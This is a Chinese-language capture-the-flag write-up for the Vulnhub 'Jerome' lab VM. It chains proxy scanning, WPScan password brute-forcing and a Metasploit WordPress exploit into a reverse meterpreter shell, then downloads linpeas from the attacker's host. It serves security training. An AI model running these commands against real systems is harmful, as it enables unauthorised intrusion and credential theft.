首页 > 其他分享 >Vulnhub之Jerome靶机详细测试过程

Vulnhub之Jerome靶机详细测试过程

时间:2022-12-31 13:33:22浏览次数:45  
标签:127.0 http 1.1 0.1 jerome wordpress Vulnhub 靶机 Jerome

Jerome

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:fe:db:5e      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.219  08:00:27:7f:57:f4      1      60  PCS Systemtechnik GmbH                                                   


利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.219

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-30 22:38 EST
Nmap scan report for 192.168.56.219
Host is up (0.000072s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
8080/tcp open  http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27
MAC Address: 08:00:27:7F:57:F4 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds

NMAP扫描结果表明目标主机有1个开放端口:8080(HTTP),运行代理服务。

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://192.168.56.219:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 3592 -b 400
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   400
[+] Exclude Length:          3592
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/30 22:43:58 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220324 / 220561 (99.89%)===============================================================
2022/12/30 22:47:22 Finished
===============================================================

看来需要将目标主机的8080端口设为代理,此时访问http://127.0.0.1,返回空白页面,但是有注释:

<!- Move along -->

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.56.219:8080
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/30 22:53:32 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 200) [Size: 7775]
Progress: 218971 / 220561 (99.28%)===============================================================
2022/12/30 22:54:20 Finished
=============================================================

发现/server-status目录

Apache Server Status for 127.0.0.1 (via 127.0.0.1)

Server Version: Apache/2.4.29 (Ubuntu)
Server MPM: prefork
Server Built: 2018-10-10T18:59:25

Current Time: Saturday, 31-Dec-2022 04:56:59 CET
Restart Time: Saturday, 31-Dec-2022 04:21:17 CET
Parent Server Config. Generation: 1
Parent Server MPM Generation: 0
Server uptime: 35 minutes 42 seconds
Server load: 0.98 0.54 0.23
Total accesses: 795722 - Total Traffic: 541.3 MB
CPU Usage: u28.69 s21.97 cu0 cs0 - 2.37% CPU load
371 requests/sec - 258.8 kB/second - 713 B/request
10 requests currently being processed, 5 idle workers

KWKKK__KKK_K..._K._.............................................
................................................................
......................

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Srv	PID	Acc	M	CPU 	SS	Req	Conn	Child	Slot	Client	Protocol	VHost	Request
0-0	613	62/51818/51818	K 	3.53	0	0	43.5	35.25	35.25 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditechFP.txt HTTP/1.1
1-0	614	4/52040/52040	W 	3.53	0	0	2.8	35.41	35.41 	127.0.0.1	http/1.1	127.0.1.1:80	GET /server-status HTTP/1.1
2-0	992	77/38457/52167	K 	2.69	0	0	54.0	26.21	35.50 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.html HTTP/1.1
3-0	993	44/38020/51573	K 	2.66	0	0	30.8	25.91	35.09 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditechFP.html HTTP/1.1
4-0	994	97/38376/51921	K 	2.69	0	0	68.1	26.16	35.33 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.php HTTP/1.1
5-0	963	0/52228/52228	_ 	3.55	0	0	0.0	35.53	35.53 	127.0.0.1	http/1.1	127.0.1.1:80	GET /200602byauthor HTTP/1.1
6-0	977	0/51752/51752	_ 	3.51	0	0	0.0	35.20	35.20 	127.0.0.1	http/1.1	127.0.1.1:80	GET /004076.js HTTP/1.1
7-0	995	31/37502/38513	K 	2.64	0	0	21.8	25.56	26.25 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditech.php HTTP/1.1
8-0	996	4/36869/49899	K 	2.60	0	0	2.8	25.14	33.96 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.js HTTP/1.1
9-0	980	81/50597/50597	K 	3.47	0	0	56.7	34.43	34.43 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.txt HTTP/1.1
10-0	981	0/50967/50967	_ 	3.49	0	0	0.0	34.68	34.68 	127.0.0.1	http/1.1	127.0.1.1:80	GET /comment-post.txt HTTP/1.1
11-0	982	8/51049/51049	K 	3.48	0	0	5.6	34.74	34.74 	127.0.0.1	http/1.1	127.0.1.1:80	GET /fsbo_news.sh HTTP/1.1
12-0	-	0/0/12323	. 	0.78	154	0	0.0	0.00	8.34 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
13-0	-	0/0/12020	. 	0.74	149	0	0.0	0.00	8.14 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
14-0	-	0/0/910	. 	0.05	201	0	0.0	0.00	0.61 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
15-0	986	0/50290/50290	_ 	3.43	0	0	0.0	34.22	34.22 	127.0.0.1	http/1.1	127.0.1.1:80	GET /movingcompanies.html HTTP/1.1
16-0	987	64/50761/50761	K 	3.49	0	0	45.0	34.54	34.54 	127.0.0.1	http/1.1	127.0.1.1:80	GET /ditechFP.sh HTTP/1.1
17-0	-	0/0/12020	. 	0.75	152	0	0.0	0.00	8.14 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
18-0	989	0/50751/50751	_ 	3.47	0	0	0.0	34.54	34.54 	127.0.0.1	http/1.1	127.0.1.1:80	GET /32676.sh HTTP/1.1
19-0	-	0/0/1718	. 	0.10	198	0	0.0	0.00	1.16 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0
20-0	-	0/0/405	. 	0.01	203	0	0.0	0.00	0.27 	::1	http/1.1	127.0.1.1:1337	OPTIONS * HTTP/1.0

发现了127.0.0.1有1337端口

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080 -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:1337
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.56.219:8080
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2022/12/30 23:00:25 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 290]
/.html                (Status: 403) [Size: 291]
/index.html           (Status: 200) [Size: 0]
/wordpress            (Status: 301) [Size: 317] [--> http://127.0.0.1:1337/wordpress/]
Progress: 8355 / 1323366 (0.63%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/30 23:00:28 Finished
===============================================================
                                                                   

Gobuster工具扫描出1337端口下有个wordpress目录

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:02:16 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Cache-Lookup: MISS from jerome:8080
 |  - Via: 1.1 jerome (squid/3.5.27)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] root
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jerome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 23:02:19 2022
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 16.059 KB
[+] Data Received: 143.36 KB
[+] Memory used: 224.133 MB
[+] Elapsed time: 00:00:02

wpscan工具识别出两个用户名root以及jerome,看能否破解密码:

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U root -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:03:22 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Cache-Lookup: MISS from jerome:8080
 |  - Via: 1.1 jerome (squid/3.5.27)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
^Cying root / sayyes Time: 00:17:23 <                                             > (145935 / 14344392)  1.01%  ETA: 28:12:23
[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.> (145940 / 14344392)  1.01%  ETA: 28:12:30
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 23:20:49 2022
[+] Requests Done: 146086
[+] Cached Requests: 29
[+] Data Sent: 57.559 MB
[+] Data Received: 608.27 MB
[+] Memory used: 266.812 MB
[+] Elapsed time: 00:17:27

Scan Aborted: Canceled by User
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U jerome -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:21:03 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Cache-Lookup: HIT from jerome:8080
 |  - Via: 1.1 jerome (squid/3.5.27)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - jerome / jerome                                                                                                  
Trying jerome / jerome Time: 00:00:02 <                                              > (420 / 14344812)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerome, Password: jerome

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 23:21:10 2022
[+] Requests Done: 586
[+] Cached Requests: 4
[+] Data Sent: 224.011 KB
[+] Data Received: 1.85 MB
[+] Memory used: 264.891 MB
[+] Elapsed time: 00:00:06

只破解出jerome用户的密码,root用户没有破解出来。

登录jerome用户,发现该用户不是管理员用户。参考其他人的做法,利用metaspoit的一个模块实现shell的获取:

msf6 exploit(multi/http/wp_crop_rce) > show options 

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   PASSWORD   jerome                      yes       The WordPress password to authenticate with
   Proxies    http://192.168.56.219:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     localhost                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/w
                                                    iki/Using-Metasploit
   RPORT      1337                        yes       The target port (TCP)
   SSL        false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                  yes       The base path to the wordpress application
   THEME_DIR                              no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   jerome                      yes       The WordPress username to authenticate with
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > set Proxies http:192.168.56.219:8080
Proxies => http:192.168.56.219:8080
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Exploiting target 0.0.0.1

[*] Started reverse TCP handler on 192.168.56.206:5555 
[-] http: The proxy returned a non-OK response
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[-] The host (192.168.56.219:8080) was unreachable.
[-] Exploit aborted due to failure: not-found: Failed to access Wordpress page to retrieve theme.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > show options 

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   PASSWORD   jerome                    yes       The WordPress password to authenticate with
   Proxies    http:192.168.56.219:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     localhost                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                  i/Using-Metasploit
   RPORT      1337                      yes       The target port (TCP)
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                yes       The base path to the wordpress application
   THEME_DIR                            no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   jerome                    yes       The WordPress username to authenticate with
   VHOST                                no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) >  set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > show options 

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   PASSWORD   jerome                    yes       The WordPress password to authenticate with
   Proxies    http:192.168.56.219:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                  i/Using-Metasploit
   RPORT      1337                      yes       The target port (TCP)
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                yes       The base path to the wordpress application
   THEME_DIR                            no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   jerome                    yes       The WordPress username to authenticate with
   VHOST                                no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > 
msf6 exploit(multi/http/wp_crop_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 192.168.56.219
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.219:42732) at 2022-12-30 23:43:58 -0500
shell[*] Attempting to clean up files...

meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)

这里特别注意,Proxies选项应当根据说明设置成: http:192.168.56.219:8080, 而不是url: http://192.168.56.219:8080

同时RHOSTS应当为127.0.0.1,否则执行会失败

meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)
which python
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

jerome@jerome:/var/www/html/wordpress$ ls
ls
KwBppbQNVC.php  wp-activate.php       wp-content         wp-mail.php
SPBLmthcHr.php  wp-admin              wp-cron.php        wp-settings.php
WpnKElxqGj.php  wp-blog-header.php    wp-includes        wp-signup.php
index.php       wp-comments-post.php  wp-links-opml.php  wp-trackback.php
license.txt     wp-config-sample.php  wp-load.php        xmlrpc.php
readme.html     wp-config.php         wp-login.php
jerome@jerome:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'jerome');

/** MySQL database password */
define('DB_PASSWORD', 'jerome');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
define('WP_AUTO_UPDATE_CORE', false);

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
jerome@jerome:/var/www/html/wordpress$ cd /home
cd /home
jerome@jerome:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Apr 16  2019 .
drwxr-xr-x 22 root   root   4.0K Mar 31  2019 ..
drwxr-xr-x  4 jerome jerome 4.0K Apr 20  2019 jerome
jerome@jerome:/home$ cd jerome
cd jerome
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 jerome jerome 4.0K Apr 20  2019 .
drwxr-xr-x 3 root   root   4.0K Apr 16  2019 ..
-rw-r--r-- 1 jerome jerome  220 Apr 16  2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16  2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16  2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16  2019 .local
-rw-r--r-- 1 jerome jerome  807 Apr 16  2019 .profile
-rw-r--r-- 1 jerome jerome    0 Apr 16  2019 .sudo_as_admin_successful
-rw-r--r-- 1   1001   1001   12 Apr 12  2019 flag.txt
jerome@jerome:/home/jerome$ cat flag.txt
cat flag.txt
b0ed001c825
jerome@jerome:/home/jerome$ sudo -l
sudo -l
[sudo] password for jerome: jerome

Sorry, try again.
[sudo] password for jerome: jerome

Sorry, try again.
[sudo] password for jerome: jerome

sudo: 3 incorrect password attempts
jerome@jerome:/home/jerome$ 

提权

将Linpeas.sh脚本上传至目标主机的/tmp目录,修改权限,并执行该脚本:

jerome@jerome:/home/jerome$ cd /tmp
cd /tmp
jerome@jerome:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-31 05:47:53--  http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 747.87K  --.-KB/s    in 0.002s  

